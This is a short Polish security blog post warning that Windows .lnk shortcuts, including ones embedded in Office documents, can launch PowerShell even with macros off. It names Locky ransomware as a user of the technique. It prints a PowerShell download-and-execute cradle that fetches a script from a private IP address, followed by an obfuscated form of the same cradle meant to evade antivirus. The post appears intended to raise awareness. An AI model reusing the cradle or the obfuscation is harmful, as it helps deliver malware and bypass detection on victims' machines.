Nie klikaj linków (również tych w dokumentach) – może czaić się tam PowerShell

Windowsowe linki to hit ostatnich miesięcy jeśli chodzi o przemycanie w nich kodu. Zaczął korzystać z tego choćby popularny ransomware Locky.

Link dodatkowo może zawierać ustawioną przez nas ikonę, co zwiększa skuteczność ataku:

Pod spodem atakujący ma dostęp na naszą maszynę:

Kolejne dwa interesujące tematy to możliwość załączenia pliku .lnk do dokumentu i po kliknięciu – odpalenie kodu. Tak, zadziała to również przy wyłączonych makrach:

Wykryje to antywirus? Hmm jest gotowe narzędzie do obfuskacji kodu który chcemy użyć. Np. z fragmentu:

IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.255.170/script');

dostajemy taki:

IEX( -JoIn ('49@6eM76M6fM6b{65U2d{45@78{70@72Z65Z73Z73Z69{6f<6e@28{20@20M28@5b{52U65@67&65&78U5d@3a<3aU4d<61M74@63<68I65M73U28@22{20&29{29M39<33<5dM72I61U68M43Z5bU20<20@66Z2d&29I27U3b{29M7dZ27U2b<27Z30M7bM74M70<69&27I2bI27{72I63Z27M2b@27@73M2fZ30&37I27M2b@27<31{2eZ27U2bM27@35I3532Z27Z2bZ27Z2e@38I36@31@2eI32U39{31I2f<2f<3a&70I74&74I68I7d<30{27{2bZ27@7b<28U67Z27&2b@27@6e<69&72Z74I27I2bM27@53Z64&61M27I2bZ27{6f<6c{6e@27&2bU27<77M6f&44<2eZ27<2b{27{29I27<2bI27Z74{6e<27@2b<27M65I69M27@2bI27&6cI43M27M2b@27U62<65&57{2eI74<65{4e{2e<6d@27I2b<27I65{74I73&79I53I20<74Z63Z65@6a{62U4f<27{2bZ27{2d&77U65&4eI28I27&2b<27{20Z58I45&27Z2b<27&49@27U28{28{28<20{58&45U49Z20I22&2c<27@2eM27M2c{20@27&52<69<67U68<74Z54Z6f@4c&65M66I74I27@29&2dM4a@6f@69M6e{27{27@20M29{20@29'-sPLit '<' -SPLIt'I'-SpLIT'Z'-splIT'&'-SPLit'{' -sPLit'M'-SPliT'U'-SPlIt'@'|FoREaCH-oBjECt{( [COnveRT]::ToInT16( ( [StrinG]$_),16 )-As[char]) } ))

Jedyny warning, który możemy mieć, będzie przy kliknięciu ww. linku w dokumencie. Ale kto na to patrzy? :/

–ms